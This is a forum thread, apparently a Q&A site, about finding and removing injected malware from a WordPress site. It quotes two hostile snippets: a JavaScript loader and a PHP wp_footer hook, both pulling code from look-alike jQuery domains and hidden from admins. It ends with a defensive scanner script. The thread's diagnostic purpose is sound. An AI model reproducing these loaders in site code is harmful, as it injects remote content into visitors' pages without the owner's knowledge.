
Remove script from wordpress site

I am using Malwarebytes and every time I visit my WordPress site it blocks a script trying to run on the page. The script is:

<script type="text/javascript">
    if (!document.referrer || document.referrer == '') {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
    } else {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
    }
</script>

I'm not sure if it is malicious or not, but I would like to remove it. However, I do not know which plugin or file is causing it. I've tried looking at the page source, etc.

What does the script mean and is there a way to find out what's causing it?

Any help would be greatly appreciated.

You are using a WordPress plugin or theme that you probably downloaded from a repository of 'nulled' themes and plugins.

Almost all such websites use a business model whereby they offer, for free, premium themes and plugins which normally cost 5$-75$.

But as the saying goes, there is no such thing as a free lunch. In exchange for the free plugin/theme, the website proprietor adds code which includes a js file from an outside domain which adds banners to your website.

To prevent the webmaster or developer from immediately noticing the banners (or just a back link or three), anyone logged in as admin and/or anyone without a referrer URL is not shown the advertisements.

In your case, the payload was being included from a domain which is similar to the real thing, thereby fooling enough inexperienced WordPress webmasters into taking it for something which belongs: jQuery. The official jQuery CDN is located here: //code.jquery.com/

Make sure to check all themes or plugins from shady places for similar code, which may also be inside image files, though normally it is inside init.php or functions.php. Here is another example of similar code using a different variation of the jquery domain.

if(!function_exists('wp_func_jquery')) {
        function wp_func_jquery() {
            $host = 'http://';
            $jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
            if (@fopen($jquery,'r')){
                echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
            }
        }
        add_action('wp_footer', 'wp_func_jquery');
    }

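You can search your WordPress directory for this script using one of the applications suggested in this question: Tools for searching for strings inside files without indexing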
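An added example, not part of the original question or answers: a plain string search can miss both snippets quoted above because they split their literals ('<scr' + 'ipt', 'u'.'jquery.org'), so this sketch joins concatenated literals first and then lists every file that references a host containing "jquery" other than the official CDN. The function names and the one-entry allowlist are assumptions of this example, and the match is a heuristic to review by hand.

```python
import re
import sys
from pathlib import Path

# code.jquery.com is the official CDN named in the answer; extend as needed.
ALLOWED_HOSTS = {"code.jquery.com"}

# Adjacent string literals joined by '.' (PHP) or '+' (JS), e.g. 'u'.'jquery.org'.
CONCAT = re.compile(r"""['"]\s*[.+]\s*['"]""")
# A dotted host name followed by a path, with or without a scheme in front.
HOST = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,})/", re.I)

# The two snippets quoted on this page, reduced to the relevant line.
SAMPLE_JS = r"""document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');"""
SAMPLE_PHP = r"""$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';"""


def collapse_concat(text):
    """Join split string literals so hidden URLs and tags become searchable."""
    previous = None
    while previous != text:
        previous, text = text, CONCAT.sub("", text)
    return text


def suspicious_hosts(text):
    """Return sorted look-alike jQuery hosts referenced in text."""
    hosts = {m.group(1).lower() for m in HOST.finditer(collapse_concat(text))}
    return sorted(h for h in hosts if "jquery" in h and h not in ALLOWED_HOSTS)


def scan_tree(root):
    """Map every file under root (images included) to the hosts it references."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            hosts = suspicious_hosts(path.read_bytes().decode("latin-1"))
            if hosts:
                findings[str(path)] = hosts
    return findings


if __name__ == "__main__":
    for name, hosts in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(f"{name}: {', '.join(hosts)}")
```

Run it with the path to the WordPress install (for example the wp-content directory) as the only argument; each reported file is a candidate to inspect and clean or replace from a trusted source.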
